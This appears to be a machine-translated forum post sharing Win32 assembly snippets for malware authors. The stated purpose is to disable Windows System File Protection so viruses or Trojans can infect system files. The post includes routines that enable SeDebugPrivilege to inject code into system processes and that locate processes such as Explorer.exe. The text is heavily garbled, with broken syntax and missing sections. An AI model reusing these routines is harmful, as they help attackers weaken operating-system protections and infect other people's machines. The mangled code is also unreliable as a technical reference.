When writing some of the viruses or Trojans infected with the infection system file, the "system file protection" seems to be full, and give everyone a closed system file protection assembly example [I will take yourself "Ice Horse"], hope A little helpful for the newcomers of Win32 compilation as me!
Please keep the source]
Author: ice fox prodigal son [http://www.icyfoxlovelace.com]
Code is divided into four parts
Turn off system file protection example .asm
.386 .Model flat, Stdcall Option Casemap: None; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>> include windows.incinclude user32.incincludelib user32.libinclude kernel32.incincludelib kernel32.libinclude advapi32.incincludelib advapi32.lib .code; >>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Folder The work code excerpts include the file protection .ASMFSB DB "Unable to turn off file protection!" MB_OK .ELSE INVOKE MessageBox, NULL, OFFSET FSB, OFFSET FSB, MB_OK .Endifret; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Soldering permissions .asm
; Elevated privileges, obtain permission to insert code in the system processes; ice fox prodigal son works the code excerpt; include advapi32.inc; includelib advapi32.libSE_DEBUG_NAME_Y db "SeDebugPrivilege", 0_EnableDebugPrivilege proc local @hToken local @tp: TOKEN_PRIVILEGES invoke GetCurrentProcess lea ecx, @hToken invoke OpenProcessToken, eax, TOKEN_ADJUST_PRIVILEGES, ecx; addr @hToken mov @ tp.PrivilegeCount, 1 invoke LookupPrivilegeValue, NULL, addr SE_DEBUG_NAME_Y, addr @ tp.Privileges [0] .Luid mov @ tp.Privileges [0] .Attributes, SE_PRIVILEGE_ENABLED invoke AdjustTokenPrivileges, @ hToken, FALSE, addr @ tp, sizeof @ tp, NULL, NULL push eax invoke CloseHandle, @ hToken pop eax ret_EnableDebugPrivilege endp find the process .asm
Depending on the program name, find the process ID; ice fox loose work code exception; include kernel32.inc; includeelib kernel32.lib; example; Namepr DB "Explorer.exe", 0; ........... Invoke_findprocess; .if Eax; find; .else; did not find; .endif; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> push edi cld; push _lpDest mov edi, _lpDest mov ecx, _dwSize xor eax, eax rep stosb; pop eax pop edi ret_ZeroMemory endp; string length is calculated (with tail 0) _lstrlen proc _lpString push edi cld mov edi, _lpString mov ecx , -1 XOR Al, Al REPNZ SCASB MOV EAX, EDI SUB EAX, _LPSTRING POP EDI RET_LSTRLEN ENDP; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Folder The upper-write string address of the process name ;; EAX = Id (EAX = 0 is not found); >>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> @StringLENGTH; @ @ @ @StringLENGTH; @ ProcessName points to the string length; for getting processes local @HSNAPSHOT LOCAL @stprocess: Processentry 32; ****************************************************************** ********************;
Calculate the length of the incoming process name string (0 of the tail); ********************************* ******************************************* Invoke _lstrlen, @ processname mov @ StringLength, Eax Invoke_zeromory, addr @stprocess , sizeof @stProcess mov @ stProcess.dwSize, sizeof @stProcess invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0 mov @ hSnapShot, eax invoke Process32First, @ hSnapShot, addr @stProcess .while eax lea esi, @ stProcess.szExeFile push esi mov edi, esi; Change to uppercase letters _nextz: lodsb cmp al, 60h ja @f and al, not 20h @@: stosb cmp bar, "/" jnz @f pop ECX; saved ESI outlet, useless Push ESI @@: or al, @ StringLength; string comparison POP ESI MOV EDI, @ ProcessName Repz cmpsb .IF ZERO?; Found the same name process (zf = 1) MOV Eax, @ stProcess.th32ProcessID JMP @f .ndif Invoke process32next, @ hsnapshot, addr @stprocess .ndw push eax invoke closehandle, @ hsnap Shot Pop Eax @@: RET_FINDPROCESS ENDP Close file protection .asm
